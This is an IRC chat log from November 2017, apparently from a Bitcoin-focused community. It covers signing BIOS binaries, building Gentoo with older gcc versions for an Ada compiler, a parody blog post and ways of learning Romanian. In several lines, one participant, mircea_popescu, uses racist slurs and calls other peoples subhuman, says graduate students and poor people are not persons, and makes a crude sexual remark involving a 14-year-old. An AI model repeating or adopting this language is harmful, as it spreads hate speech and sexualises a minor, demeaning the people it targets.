1740260;1510967521;asciilifeform;notbad 1740261;1510967559;*;BingoBoingo scheduled to arrive same time one day after leaving 1740262;1510967999;BingoBoingo;brb, sobertime 1740263;1510971859;shinohai;One day, Maria decided to show those American teachers how it's *really* done: http://archive.is/NYiSt 1740264;1510985273;BingoBoingo;!~ticker --market all 1740265;1510985281;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7672.41, vol: 15851.94799197 | Bitfinex BTCUSD last: 7638.8, vol: 72545.60110328 | CampBX BTCUSD last: 7000.0, vol: 0 | Kraken BTCUSD last: 7685.8, vol: 5451.1288452 | Volume-weighted last average: 7647.2070127 1740266;1510988024;ben_vulpes;welp, completely struck out installing ada compiler tonight 1740267;1510988069;ben_vulpes;tried both binturd from libre.adacore and a portage ebuild 1740268;1510988151;ben_vulpes;likely has to do with that this box is running gcc 5.4.0, i think i have to figure out how to make a gentoo with gcc 4.9 1740269;1510989834;ben_vulpes;okay well *something* is compiling on my closet iron now 1740270;1511020353;mircea_popescu;http://btcbase.org/log/2017-11-17#1740118 << precisely. self-interest is intended to pull the republican cart here. everyone is very well advised to take the matter seriously, do his own research for his own needs and let's see if we can distil it down to a workable list. 1740271;1511020353;a111;Logged on 2017-11-17 06:13 trinque: yep, I will have to do some research there myself. 1740272;1511020388;mircea_popescu;and ideally derive some mutual-support benefit, such as A gets to use B's bios even if it wasn't the top of his list of needs. 1740273;1511020570;mircea_popescu;http://btcbase.org/log/2017-11-17#1740123 << moreover, i fully expect we'll be drawing some loser lots before we figure out exactly what we want. "intellectual property" right, "i know which kind of box works best for each of our tasks". 1740274;1511020570;a111;Logged on 2017-11-17 06:37 trinque: for the simple webhosting and bothosting cases, of which there oughta be many, max-spec'd machine is not necessary 1740275;1511020618;mircea_popescu;eg, originally phuctor box was specified with lots and lots of ram, then software improvement brought that original perceived bottleneck ~in line with the others so overram no longer a critical measure of box quality. and so following. 1740276;1511020713;mircea_popescu;http://btcbase.org/log/2017-11-17#1740127 << i wouldn't be too worried, trilema serves up to 5k simultaneous connections off a single box. 1740277;1511020713;a111;Logged on 2017-11-17 06:48 BingoBoingo: Still, calls to it add up 1740278;1511020852;mircea_popescu;http://btcbase.org/log/2017-11-17#1740131 << aactually... you can. we did this already, with FUCKGOATS no less! 1740279;1511020852;a111;Logged on 2017-11-17 14:06 asciilifeform: http://btcbase.org/log/2017-11-17#1740117 << you can't v-root an item containing binturds. and the only x86 bios without winturds, is for opteron or ancient (pre-2008) intels. with recent chips even binturd-containing coreboot dun work, and yer stuck with the heathen fw shipped in the box. 1740280;1511020912;mircea_popescu;binturds are NOT unapproachable. they are very much as approachable as, eg, reversing ivory/bolix software. not necesarily as perfumed, but be that as it may. 1740281;1511020932;mircea_popescu;i would much prefer to have a v-root for whatever bios, with the binary clearly laid out, so people with the competence can take it apart. 1740282;1511020963;mircea_popescu;rather than pretend alongside the usg tards it's an "insurmountable task". it's not. build the tools and spend the time, do your part to ruin wintel and with it the united states. 1740283;1511021084;asciilifeform;mircea_popescu: in FG, i signed binturds that i ~generated~ ( e.g. jpeg of schematic ) 1740284;1511021094;mircea_popescu;so ? 1740285;1511021098;mircea_popescu;a binturd is a binturd. 1740286;1511021110;mircea_popescu;yes, yours is already reversed. the others aren't YET. 1740287;1511021169;asciilifeform;it's a perfectly ordinary use of sig ( supposing one remembers to write proper disclaimer, 'i sign what i found , from wherever' ) . but not of v -- the diffs aren't meaningful 1740288;1511021255;asciilifeform;iirc asciilifeform actually posted a binturd bios once, that he cracked ( for stinkpad x60 , which normally refuses aftermarket nic ) 1740289;1511021406;mircea_popescu;what you mean is "the diffs aren't directly meaningful" which is true, but also what can we do ? 1740290;1511021410;mircea_popescu;indirectly meaningful diffs. 1740291;1511021434;asciilifeform;they carry no meaning at all. change 1 byte and you get a turd every bit as large as the genesis. 1740292;1511021458;mircea_popescu;v is still needed to manage the metadata on them. such as you know, the textfile explaining how to produce them and what (at least) portions say 1740293;1511021483;mircea_popescu;asciilifeform the interesting part is where you change 1 byte and you get sony's copy protection in a new package. 1740294;1511021486;asciilifeform;so genesis the text file, and it contains the turd hashes. this is what i did with fg. 1740295;1511021511;mircea_popescu;i wasn't proposing to treat the binturds as genesis themselves, no. attached exactly in manner fg did it 1740296;1511021516;asciilifeform;http://btcbase.org/patches?patchset=fg&search= << as seen here 1740297;1511021521;mircea_popescu;imo you solved this "i got bins, they're needed but hated" problem correctly, there. 1740298;1511021531;asciilifeform;aite. this -- imho is The Right THing. 1740299;1511021535;mircea_popescu;right. 1740300;1511021543;*;asciilifeform brb,teatime 1740301;1511024168;mircea_popescu;pete_dushenski there ? 1740302;1511024186;asciilifeform;!~later tell ben_vulpes http://btcbase.org/log/2017-11-18#1740266 << you gotta post the barf, post the eggog! srsly nobody can helpya unless you post, post the eggog. 1740303;1511024186;a111;Logged on 2017-11-18 06:53 ben_vulpes: welp, completely struck out installing ada compiler tonight 1740304;1511024186;jhvh1;asciilifeform: The operation succeeded. 1740305;1511024944;mod6;mornin' 1740306;1511025250;asciilifeform;ohai mod6 1740307;1511025475;mod6;how goes alf? 1740308;1511025566;asciilifeform;slowly. 1740309;1511025572;asciilifeform;and you, mod6 ? 1740310;1511025624;mod6;nb. been workin on / looking at the privkey tools requests. 1740311;1511025826;mod6;buncha stuff to do hehe. 1740312;1511026085;shinohai;Afternoon mod6 o/ 1740313;1511028538;ben_vulpes;asciilifeform: not stuck yet, trying other things 1740314;1511028603;ben_vulpes;but the very very funny event was the script from the adacore binstaller simply fails, and instructed me to check an empty log file 1740315;1511030858;mircea_popescu;buh bye 1740316;1511030977;shinohai;mircea_popescu was extremely patient with that one ...... 1740317;1511030988;mircea_popescu;i guess. 1740318;1511031015;mircea_popescu;anyway, this strategy whereby one contributes nothing to the conversation but insists to advertise their name through join/part spamming nevertheless... bad idea, really. 1740319;1511031018;mircea_popescu;nobody will like you. 1740320;1511031050;shinohai;He had certainly ground my gears for weeks. 1740321;1511032039;shinohai;Wonder how the Argentines are doing with their hunt for Rojo Octubre today. 1740322;1511032342;deedbot;http://trilema.com/2017/this-blog-is-now-about-bticino-and-other-coinsiderations/ << Trilema - This blog is now about Bticino, and other coinsiderations 1740323;1511032353;mircea_popescu;sorry to disappoint everyone ; but i've sold all my bitcoin and am 100% bticino hodler nao. this is the right fork guyse as it will totally win the letter ordering debate and is supported by broad letter consensus. see you all @moon soon. 1740324;1511032428;mod6;<+shinohai> Afternoon mod6 o/ << o7 1740325;1511033330;ben_vulpes;relevant barf from a failure to emerge 'dev-lang/gnat-gpl' 1740326;1511033336;ben_vulpes;http://p.bvulpes.com/pastes/HTCnr/?raw=true 1740327;1511034791;jurov;ben_vulpes: i'd try to disable the cxx useflag (or maybe all useflags the package has, for that matter) 1740328;1511034866;jurov;because nfi what gnat needs C++ for 1740329;1511035204;ben_vulpes;mm i'll try that; gentoo wiki ada page said to make ADAFLAGS=${CFLAGS} ty jurov 1740330;1511036015;asciilifeform;http://btcbase.org/log/2017-11-18#1740326 << what's in yer gcc-config ? 1740331;1511036015;a111;Logged on 2017-11-18 19:28 ben_vulpes: http://p.bvulpes.com/pastes/HTCnr/?raw=true 1740332;1511036029;asciilifeform;or alternatively, what do you get out of gcc --version ? 1740333;1511036393;mircea_popescu;awww y nobody cares about bticino! 1740334;1511036516;mircea_popescu;http://btcbase.org/log/2017-11-17#1740139 << nb. 1740335;1511036516;a111;Logged on 2017-11-17 14:20 asciilifeform: back to coreboot, fwiw i have a working build for 'pcengines' 1740336;1511036565;asciilifeform;frabtcino was burned at the stake neh 1740337;1511036570;asciilifeform;or was that sumbdyelse.. 1740338;1511036606;mircea_popescu;bt~i~cino! 1740339;1511036679;mircea_popescu;http://btcbase.org/log/2017-11-17#1740158 << not an actual thing yet, just a very loose spec-doodle of an eventual item 1740340;1511036679;a111;Logged on 2017-11-17 18:52 Ingolfr_Arnarson: And mentioned gossipd was the name of the actual thing. 1740341;1511036759;mircea_popescu;which reminds me, RagnarDanneskjol anything re http://btcbase.org/log/2017-11-06#1733207 ? 1740342;1511036759;a111;Logged on 2017-11-06 12:59 mircea_popescu: spend the usual 200 hours/week connected to irc and doing whatever clerical tasks provided. must be native chinese speaker with a reasonable command of english, she's not expected to take calls or anything in it. 1740343;1511036816;mircea_popescu;http://btcbase.org/log/2017-11-17#1740172 << (((blunder))) 1740344;1511036816;a111;Logged on 2017-11-17 19:49 ben_vulpes: hmac blunder also epic 1740345;1511036897;mircea_popescu;http://btcbase.org/log/2017-11-17#1740178 << much in the way usg had a frigate^H^H^H^H littolol combat ship 1740346;1511036897;a111;Logged on 2017-11-17 20:09 ben_vulpes: lol argentina had a submarine?! https://www.nytimes.com/2017/11/17/world/americas/argentina-submarine-missing.html 1740347;1511037210;mircea_popescu;http://btcbase.org/log/2017-11-17#1740187 << how the fuck does deflating the hedge-fund-masquerading-as-college bubble hurt the fucking niggers being used as enablers ? 1740348;1511037210;a111;Logged on 2017-11-17 20:44 asciilifeform: in other butthurts, https://archive.is/nw25r >> 'For M.I.T. students, this waiver keeps us from having to pay a bill of about $50,000 every year — a staggering amount, but one that is similar to the fees at many other colleges and universities. ... But under the House’s tax bill, our waivers will be taxed. This means that M.I.T. graduate students would be responsible for paying taxes on a $80,000 annual salary, when we actually e 1740349;1511037222;mircea_popescu;graduate student just as 100% idle hopeless underproducing hyperconsumer with or without rule. 1740350;1511037273;mircea_popescu;$50k a year "staggering ammount", dork wants to pretend like he has anything to say on any topic ? POOR PEOPLE MAY NOT SPEAK. 1740351;1511037276;mircea_popescu;go make some fucking money! 1740352;1511037646;mircea_popescu;https://www.youtube.com/watch?v=nuvPhAuQFD4 << "this is over. what are you ? face facts. you're a schmuck, calling himself "graduate student" who shags my receptionist and then wants to sit at the grown-up table talking science. but it's my fault. i aaaalmost took you seriously. please go away! we have absolutely nothing to talk about. you have nothing in your pockets! you are not an agent here. you are not an agent at all!" 1740353;1511037865;asciilifeform;mircea_popescu: it's 'staggering amount' to the derp who is in the 0% tax bracket today but would theoretically live in the 40% if the discount were to be counted ( as it by all rights oughta ) as income 1740354;1511037876;mircea_popescu;http://btcbase.org/log/2017-11-17#1740192 << mit was struck ; it's only now figuring it out. 1740355;1511037876;a111;Logged on 2017-11-17 20:54 asciilifeform: not that usd is required to obey conservation of mass, but possibly mit is about to be struck off the list of folx having the crown privilege to make it appear and disappear on command in this way. 1740356;1511037919;mircea_popescu;which is the real lulz behind that "decimation of american productivity". usg.blue lost "american" trademark, did not REALISE this ; lost also tax immunities, and HAD NO IDEA. only approximation is a cow so dumb it only notices someone cut off its legs when trying to stand up. 1740357;1511037953;mircea_popescu;asciilifeform it's a staggering ammount to the schmuck who fucks my receptionist because i can't be arsed to kill flies yet goes about pretending is human being and all that. 1740358;1511037966;mircea_popescu;no graduate student is a person, nor ever was, wtf already. 1740359;1511038077;asciilifeform;at this point i suspect the remaining ones are, to a man, chinese coolies. send'em a tax bill, they'll shrug and take it home to pekin when their tour of duty ends, frame on a wall. 1740360;1511038119;mircea_popescu;http://btcbase.org/log/2017-11-17#1740200 << reminds me about that sf piece of alt-world in which time machine was invented but restricted to "academic and research usage", wherein a dude discovers all the "primitive savages" he is "studying" are similar students, they're4 basically studying each other's execution of what they themselves think past wast. 1740361;1511038119;a111;Logged on 2017-11-17 20:59 ben_vulpes: unrelolted: http://www.fox2detroit.com/news/local-news/detroit-police-officers-fight-each-other-in-undercover-op-gone-wrong 1740362;1511038156;mircea_popescu;asciilifeform i've known more than one fellow with a "us court conviction" so framed and displayed. amusingly enough, these are STILL produced. 1740363;1511038170;asciilifeform;mechanical process 1740364;1511038190;mircea_popescu;recently, gave a bunch of chinese intel workers this distinction. it's practically speaking the Order Of UStards are Retarded, first class. 1740365;1511038215;mircea_popescu;put it right next to the Legion d'Honneur etc foreign insignia. 1740366;1511038244;asciilifeform;'i have two death sentences from clitler in absentia!' 'but i have three, nyahaha!' 1740367;1511038249;mircea_popescu;quite 1740368;1511038278;mircea_popescu;some people had from hitler AND dej. i guess none of them will ALSO have from bahamas. 1740369;1511038283;mircea_popescu;it'd have made a nice triplet tbh. 1740370;1511038303;mircea_popescu;"the all-socialisms chivalric orders corner" 1740371;1511038544;mircea_popescu;asciilifeform but anyway, no. "graduate student" is 100% the human composition of wikipedia, reddit etc. 1740372;1511038567;asciilifeform;it's a massive and varied refuse pile. the technical types are ~100% cn. 1740373;1511038571;mircea_popescu;there's the chinese coolies who grad student in places where work is required ; then there's the poor-but-stupid us-born tard, who graduatestudents where no work is required, spends day being "expert" online 1740374;1511038636;*;asciilifeform only personally toiled with the former 1740375;1511038652;mircea_popescu;http://trilema.com/2016/superficial-ustardian-onanism-suto/ is teh word for the bulk of 'em 1740376;1511038746;mircea_popescu;(with, of course, the all important http://trilema.com/2017/global-warming-on-triton/#footnote_0_71308 correlate) 1740377;1511038759;mircea_popescu;THAT is what esl speaker has in mind when saying "grad student". 1740378;1511038990;mircea_popescu;http://btcbase.org/log/2017-11-17#1740234 << dexonline.ro has a large and afaik downloadable db. 1740379;1511038990;a111;Logged on 2017-11-17 23:07 asciilifeform: http://www.free-soft.ro/everest/everest.html has nominally ~200k but is malwareware and enciphered db ( i dun currently have time to break the delphiturd and extract the key, sadly ) 1740380;1511039033;mircea_popescu;i'd propose it as the standard. explicative dictionary, of course, not "translative" dictionary. this is the correct approach btw, "translation" dictionary is made of 100% sheer nonsense and not to be touched. 1740381;1511039074;mircea_popescu;now, the item suffers from the EXTREME braindamagedness of romanian academics, 1967-2017, and is consequently not nearly as useful as could be ; most definitions are severely broken logically, even if heuristically usable. 1740382;1511039115;mircea_popescu;but this is an universal problem of all languages advanced enough to have a dictionary -- the "scholars" are too dumb to produce the correct item. 1740383;1511039155;mircea_popescu;http://btcbase.org/log/2017-11-17#1740235 << ew that sux. 1740384;1511039155;a111;Logged on 2017-11-17 23:56 lobbes: update on archive-o-tron: Looks like leveraging archive.is is getting nowhere fast; according to the archive.is d00d 'download .zip is actually broken' 1740385;1511039212;mircea_popescu;http://btcbase.org/log/2017-11-17#1740240 << use wget-of-archive-page and zip that! 1740386;1511039212;a111;Logged on 2017-11-17 23:59 lobbes: damn 1740387;1511039302;mircea_popescu;http://btcbase.org/log/2017-11-18#1740244 << amusingly, the evident "constant upgrades philosophy stranded ycombinator" angle unvoiced. 1740388;1511039302;a111;Logged on 2017-11-18 00:06 BingoBoingo: In still coaster lollers: "Thiel's departure from Y Combinator was not previously announced. It comes long after Y Combinator president Sam Altman defended Thiel's role at the accelerator, following criticism of Thiel's support of then-presidential candidate Donald Trump. A source close to Y Combinator said that the company ended its part-time partners program, which Thiel was a part of, some time last year. While some other part-time 1740389;1511039312;mircea_popescu;because clearly what's important is the pantsuitism not teh reality. 1740390;1511039393;mircea_popescu;http://btcbase.org/log/2017-11-18#1740246 << "as many as 150" is a very lulzy statement on the importance of democracy / community / etcetera. 1740391;1511039393;a111;Logged on 2017-11-18 00:19 shinohai: http://archive.is/07Oas <<< I guess no use going thru the trouble of shutting down the sybil nodes or w/e 1740392;1511039562;asciilifeform;http://btcbase.org/log/2017-11-18#1740380 << dafuq, how's a n00b supposed to work with an adult dictionary ?! 1740393;1511039562;a111;Logged on 2017-11-18 21:03 mircea_popescu: i'd propose it as the standard. explicative dictionary, of course, not "translative" dictionary. this is the correct approach btw, "translation" dictionary is made of 100% sheer nonsense and not to be touched. 1740394;1511039573;mircea_popescu;same way children do it. 1740395;1511039583;asciilifeform;children got their fw preflashed. 1740396;1511039589;mircea_popescu;no such thing. 1740397;1511039614;mircea_popescu;the way adult woman is deflowered is EXACTLY same way she'd have been deflowered at 14, were she not a retard at 14 : cock goes in. 1740398;1511039650;mircea_popescu;there's no special procedure for any age, hole, or circumstance of any kind. always the same process. 1740399;1511039675;asciilifeform;'get a harem of aboriginals, fughetabout dictionaries' such classic road cone. 1740400;1511039778;mircea_popescu;jussssst dooo it! 1740401;1511039904;mircea_popescu;"romanian-english dictionary" is the exact equivalent of programming in "microsoft visual c". 1740402;1511039932;mircea_popescu;even if your binary runs, your brain suffered in the process. 1740403;1511040169;asciilifeform;i'll still take it over 'learn from context' nonsense. 1740404;1511040334;mircea_popescu;sure. 1740405;1511040660;mircea_popescu;it's not FORBIDDEN. but if you insist to break the "why do you think you have anything to SAY yet" rule and instead of reading ro text with ro explicative dictionary as per http://btcbase.org/log/2016-12-09#1580455 jump ahead to trying to ~produce~ ro text on the basis of your english ideas augmented by a english-to-ro translateatron, the result will be that you'll end up with a subset of romanian as permitted by your english 1740406;1511040660;a111;Logged on 2016-12-09 16:12 mircea_popescu: trinque the method i recommend, if you care, is to work selections of classical texts with the dictionary ; then proceed to answer any systematic questions you have when you're sick of the slog. 1740407;1511040660;mircea_popescu; vocabulary and general language propriety ; and consequently miss out on most of the gains from http://btcbase.org/log/2016-12-21#1587276 1740408;1511040660;a111;Logged on 2016-12-21 18:32 mircea_popescu: because no, words don't "have meanings". your meanings for ANY WORD are a function of ALL THE OTHER WORDS YOU KNOW. which is why my definitions regularily blow out english dictionaries, wikipedia and other sources of "wisdom" out of the water - i know more words, and in this knowledge i know all the words i know ~better~. infinitely and irreproducibly so. 1740409;1511040695;mircea_popescu;gains ~not just for the "new" language~! the old one as well! i'm a much better english speaker than absolutely any esl speaker BECAUSE i speak a bunch of other languages that ARE NOT english, which STRENGTHENS my english. 1740410;1511040743;mircea_popescu;exactly as per that http://trilema.com/2017/this-blog-is-now-about-bticino-and-other-coinsiderations/#footnote_8_75919 fuckbridge note. 1740411;1511040867;asciilifeform;i won't disagree that translative dictionary is only good for reaching takeoff velocity, and folx who try to ~write~ using one, rather than using years of actual literature eaten, are in a state of sin 1740412;1511040888;asciilifeform;but you somehow gotta get to that takeoff, and not everyone has dirigible. 1740413;1511041016;asciilifeform;also i will note that english is a pretty poor example for this thread, it is missing so many pieces that folx who ~think~ in it are visibly handicapped in all walks of life, not merely for learning ro 1740414;1511041870;mircea_popescu;you get to this takeoff in the manner children do, which is : be seen and not heard. you... read. 1740415;1511041889;mircea_popescu;until you have enough familiarity for the proper dict to be useful to you, you don't properly speaking have anything to say. 1740416;1511041929;asciilifeform;to say ? noshit, no 1740417;1511041937;mircea_popescu;i can't answer for others, but i, a man with no particular place to go and no specific time to be there, find in general the approach endlessly entertaining. go into a two day loop through whatever lang's dict after having read a phrase in some classical work. 1740418;1511041965;mircea_popescu;it's why i won't learn subhuman languages, such as anything black people ever made : not NEARLY enough classics to keep me interested in this manner. 1740419;1511042009;mircea_popescu;this is also why i've not learned say sanskrit, and why i despise indians as the cultural construct. bitch, interrupted classics isn't a qualifier, if all the jews had ended in 300 ad they'd be in the same pot. 1740420;1511042029;asciilifeform;no classics -- monkeylang. dun see what to disagree with. 1740421;1511042043;mircea_popescu;now, one could say "but of course, mp is rich, man of leisure". except... i STILL didn't have a particular destination / timetable as an eight year old. if anyone's ever poorer than a child... 1740422;1511042047;asciilifeform;interrupted classics are of interest to archaeologist. 1740423;1511042084;mircea_popescu;asciilifeform they can take their "yoni"s and shove them, i'm too busy archeologisting actual things to be bothgered with "but mp, before going to shit india was interesting". had i lived before it went to shit, i might've persuaded by this. 1740424;1511042148;mircea_popescu;"but mp, if you don't study failures how to avoid mistakes ???" "study non-failures and non-do what they didn't do either!" wtf, ima have to look at anything but WORKING engine to establish how to not make engine ? pshaw. 1740425;1511042187;asciilifeform;learnable-from failures are a rare luxury even in engineering 1740426;1511042195;mircea_popescu;almost 0 shits given to "after ww2 but before clinton, america the great" wank for very much this reason, actually. 1740427;1511042196;asciilifeform;normally 'it burned down and who the fuck knows why' 1740428;1511042215;mircea_popescu;asciilifeform learnable failures are always the byproduct of an eventuallty successful complete tree. 1740429;1511042234;mircea_popescu;absent either the eventually or the complete... it's back to black monkeys picking through each other's fur. 1740430;1511042374;asciilifeform;returning to dictionaries -- it's a piton, for penetrating the otherwise impenetrable n00b texts ( e.g. children's lit ) . not a 'hey i am nigerian and i found an englisch dictionary and nao i speak to you about our road to riches and fame' 1740431;1511042395;mircea_popescu;which they do, endlessly entertainingly. let me show you the most recent : 1740432;1511042437;mircea_popescu;http://p.bvulpes.com/pastes/fhGdV/?raw=true << the married miss and other gems of nigerian classical thought. 1740433;1511042483;asciilifeform;lol, nao this is a first on asciilifeform's watch, ro spamola 1740434;1511042515;mircea_popescu;aha 1740435;1511042524;mircea_popescu;i get abo9ut one a week but this one's very good 1740436;1511042538;asciilifeform;the 'Dacă doriți să vă recuperați ex' is so very orc 1740437;1511042539;diana_coman;ahahahah "dacă aveți probleme care vă ajută" 1740438;1511042552;asciilifeform;'cast this spell to regain yer boyfriend' 1740439;1511042561;mircea_popescu;diana_coman solvind! 1740440;1511042568;asciilifeform;iirc about half of voodoo repertoire is re this 1740441;1511042580;shinohai;Since it is from Romanian brujas, I bet it worx 1740442;1511042580;diana_coman;mircea_popescu, I'd say plenty *poorer* than children actually; I can't see how is "adult" with debt and whatnot "richer" than child 1740443;1511042587;asciilifeform;^^^ 1740444;1511042604;asciilifeform;the 8yo, with 0 homework etc is in his eden. 1740445;1511042607;mircea_popescu;diana_coman but constructs OF STUPIDITY have no bearing on the actual reality. child is, natura nuda, poorest thing that can exist. 1740446;1511042629;mircea_popescu;can't even walk into a bar walk away with a woman. 1740447;1511042641;mircea_popescu;this deep, overwhelming poverty of childhood is what eg malena hero struggles with. 1740448;1511042643;asciilifeform;but dun gotta work. 1740449;1511042652;mircea_popescu;nobody gotta work. 1740450;1511042658;mircea_popescu;everyone works by choice. 1740451;1511042663;asciilifeform;ahahahaha roadcone 1740452;1511042666;mircea_popescu;oya. 1740453;1511042685;mircea_popescu;incidentally, walked past item in market yest, "and god walked the earth, and came upon a man who was so very poor 1740454;1511042687;shinohai;In the latest US Naval mishaps: http://archive.is/krIMV 1740455;1511042688;mircea_popescu;all he had was money." 1740456;1511042695;diana_coman;well, I get what you mean i.e. that's the zero, yes; however ...constructs of stupidity do...exist, what can I say 1740457;1511042702;mircea_popescu;surely they do exist. 1740458;1511042718;mircea_popescu;and people who cut off their own leg to spite the doctor do exist from what i hear. 1740459;1511042720;mircea_popescu;what can you do ? 1740460;1511042724;asciilifeform;shinohai: text obscured by crapolade, unreadable 1740461;1511042729;shinohai;http://time.com/5030829/uss-benfold-tug-boat-collision/ 1740462;1511042734;shinohai;yeah fuck Time 1740463;1511042842;mircea_popescu;asciilifeform you'd love archeology by the way. half the job is "here's this pile of relations with no cognitive correlate. please explain." 1740464;1511042861;mircea_popescu;usually this returns "religious artefact AND GET THE FUCK OUT OF MY OFFICE". understandably. 1740465;1511042890;mircea_popescu;hermeneutics, amirite. "how to map complex structures". 1740466;1511042974;asciilifeform;mircea_popescu: reversing winturds, possibly surprisingly, is little different : a good 80% of the binturd has no arithmetical reason for being there 1740467;1511043046;diana_coman;make a not that there are negative, "non-natural" numbers, what else is there to do, lol 1740468;1511043052;asciilifeform;( or greater %, if item is product of deliberate obfuscation, rather than merely microshit ) 1740469;1511043055;diana_coman;or a knot I suppose; note* 1740470;1511043259;ben_vulpes;asciilifeform: the box that barfed uses gcc 5.4.0 1740471;1511043311;shinohai;ben_vulpes: I had 0 luck until gcc 4.9.4 1740472;1511043428;asciilifeform;ben_vulpes: linker in 5 is incompatible with 4, likely explains such cases 1740473;1511043437;asciilifeform;the surest pill is simply not to have 5 on the box. at. all. 1740474;1511043483;ben_vulpes;asciilifeform: i tried recently to build a chroot with 4 from the machine with 5 to no avail 1740475;1511043491;asciilifeform;nao iirc there is finally a gnat built on 5. but i have not tried it, and can't yet think of a reason to try it 1740476;1511043506;asciilifeform;ben_vulpes: once you have 5, yer pretty much phuqed 1740477;1511043539;asciilifeform;faster to format the hdd and start again, than to try to manually separate the flies from the cutlets. 1740478;1511043553;ben_vulpes;hey trinque do you still have that script for "infectious gentoo"? i might be able to get my old closet iron with 4.9 to build a respectable userland 1740479;1511043579;ben_vulpes;asciilifeform: yeah i have now pissed upon this electrified fence as well 1740480;1511043666;ben_vulpes;i couldn't find a stage3 with 4.9 on it when i needed it for this machine, and so got 'phuqed' 1740481;1511043735;ben_vulpes;republic really doesn't have repeatable steps for building a gentoo with gcc 4.9, does it 1740482;1511043768;ben_vulpes;"step 1: build a gentoo five years ago" 1740483;1511043799;asciilifeform;better 10, lol 1740484;1511043814;ben_vulpes;right? 1740485;1511043819;asciilifeform;ben_vulpes: sure it does. use my useflags banlist, and include gcc >= 5 1740486;1511043860;asciilifeform;!!up gabriel_laddel 1740487;1511043860;deedbot;gabriel_laddel voiced for 30 minutes. 1740488;1511043892;mircea_popescu;asciilifeform i am well aware, yeh 1740489;1511043940;ben_vulpes;asciilifeform: i did that, but i believe that 5 snuck in from stage3. at the time i got loads of errors about 5 being present on the system in violation of use flag specification, attempted to purge but this did not result in a usable box somehow 1740490;1511044057;mircea_popescu;o hey, ignoring flags nao ? 1740491;1511044084;asciilifeform;stage3 method ( the only one supported by post-infiltration gentoo ) is a tar fulla binturds 1740492;1511044092;asciilifeform;so no, flags dun help there. 1740493;1511044092;ben_vulpes;more likely i made a mistake 1740494;1511044100;ben_vulpes;oh, mistake was to stage3 1740495;1511044225;mircea_popescu;ic 1740496;1511044228;ben_vulpes;i don't really know how to apply your use flags to the creation of a new gentoo then. i do have an older gentoo box that is pretty faithful to the crapolade flags, has gcc but don't really have a map for making that produce a root fs that i can put on another box or what even the correct way to go about doing what i want to do 1740497;1511044255;ben_vulpes;(gcc 4.9.4) 1740498;1511044275;ben_vulpes;gabriel_laddel: what'd the lawyer say? 1740499;1511044298;asciilifeform;ben_vulpes: i'd like to find a pill for this problem that doesn't involve preserving a magic binturd in amber 1740500;1511044318;asciilifeform;( yes i could post a known-worked stage3. but eww ) 1740501;1511044333;ben_vulpes;yeah i have one of those as well but also ew 1740502;1511044343;ben_vulpes;doesn't gcc itself count as a magic binturd? 1740503;1511044362;asciilifeform;it does if you magicize a compiled gcc sure 1740504;1511044374;asciilifeform;but notion of unix is that you can take whatever c compiler you got, and bootstrap 1740505;1511044386;mircea_popescu;we have gcc 4.9.x source then ? 1740506;1511044411;mircea_popescu;and for that matter, evidently "whaterver you got" dun include post wreckage gcc 5+ 1740507;1511044412;asciilifeform;aha. but you can't build it with 5, apparently. 1740508;1511044421;mircea_popescu;asciilifeform where is it ? 1740509;1511044428;asciilifeform;mod6's mirror 1740510;1511044452;asciilifeform;http://thebitcoin.foundation/trb-howto.html << grep for gcc 1740511;1511044460;shinohai;Tis on shithub too https://github.com/gcc-mirror/gcc/releases/tag/gcc-4_9_4-release 1740512;1511044461;mircea_popescu;!#s gcc mirror 1740513;1511044461;a111;2 results for "gcc mirror", http://btcbase.org/log-search?q=gcc%20mirror 1740514;1511044462;asciilifeform;' 0x17) Get http://deedbot.org/deed-427443-5.txt : name it 'gcc-4.9.2.tar.bz2.asc' ' 1740515;1511044471;asciilifeform;shinohai: fughet shithub 1740516;1511044496;mircea_popescu;nice work mod6 1740517;1511044512;asciilifeform;it's part of the rotor flow, gotta be there 1740518;1511044528;mircea_popescu;aha. 1740519;1511044542;shinohai;Ah yeah somehow I had forgotten that *DUH* is part of trb 1740520;1511044544;asciilifeform;recall, original 'gcc5 is fatally touched' discovery happened on n00bz building rotors 1740521;1511044551;mircea_popescu;yup 1740522;1511044633;ben_vulpes;asciilifeform: couldja sketch how this pill might work for me? 1740523;1511044667;asciilifeform;ben_vulpes: ideally would work on all known c compiler, and from there build gcc buildroot-style, and from there - world 1740524;1511044673;mircea_popescu;ben_vulpes ride the rotor train all the way to there then have it build whatever it is you're building. 1740525;1511044703;asciilifeform;i've thought about investigating whether gcc4 can be made to build on fabrice bellard's tinycc 1740526;1511044722;ben_vulpes;heh i was just reading about that 1740527;1511044729;asciilifeform;which in turn builds on just about anything vaguely c-flavoured 1740528;1511044736;ben_vulpes;makes elfs and everything 1740529;1511044822;ben_vulpes;mircea_popescu: "whatever it is you're building" is "gentoo", and what goes into that is still a mystery to me 1740530;1511044913;ben_vulpes;"babbys first linux distro" 1740531;1511044916;*;ben_vulpes bbl 1740532;1511045035;mircea_popescu;mmm, i dunno that we have a gentoo equivalent of this deeded anywhere. 1740533;1511045114;mircea_popescu;aand in other cultural superiorities, https://archive.is/PYLfT#selection-857.111-863.79 1740534;1511045157;asciilifeform;dafuq's that 1740535;1511045195;mircea_popescu;huffpo 1740536;1511045521;mircea_popescu;(to explain the lulz : huffpo penned piece about gervais, whio's still active and who did whatever huffpo-demo interest item recently ; upon deciding they want to write it up they proceeded to "do research" in "depth" as such works ; as it happens trilema owns millions of "long tail" items, including as the case is here whatever-they-searched-about either cemetery junction or gervais or some combination of other words. eviden 1740537;1511045521;mircea_popescu;tly did not read the article, but hey.) 1740538;1511045556;mircea_popescu;the point being that the pantsuit machine RELIES on there not existing toxicitems in the environment, because the whole thing is so least-effort driven as to directly uptake them if present. 1740539;1511045562;asciilifeform;it reads like perlade 1740540;1511045596;mircea_popescu;as opposed to which part of libertard discourse ? 1740541;1511045623;asciilifeform;as opposed to where they still have meat in the loop 1740542;1511045641;asciilifeform;( pre-'millenial' meat ) 1740543;1511045644;mircea_popescu;this is perl-on-suto aka "graduate student" 1740544;1511045649;mircea_popescu;this is what the empire is. 1740545;1511045692;asciilifeform;deedbot removes voice from gabriel_laddel << poor d00d, must've amputated hands nao, not only feet 1740546;1511045849;mircea_popescu;in other lulz, looking through logs we notice trilema served 1.5mn pages... earlier today, during four hours or so. this is usually a week or two's worth. 1740547;1511045927;mircea_popescu;so ima have to alter that http://btcbase.org/log/2017-11-18#1740276 to moar like 50k to reflect this new record. 1740548;1511045927;a111;Logged on 2017-11-18 15:58 mircea_popescu: http://btcbase.org/log/2017-11-17#1740127 << i wouldn't be too worried, trilema serves up to 5k simultaneous connections off a single box. 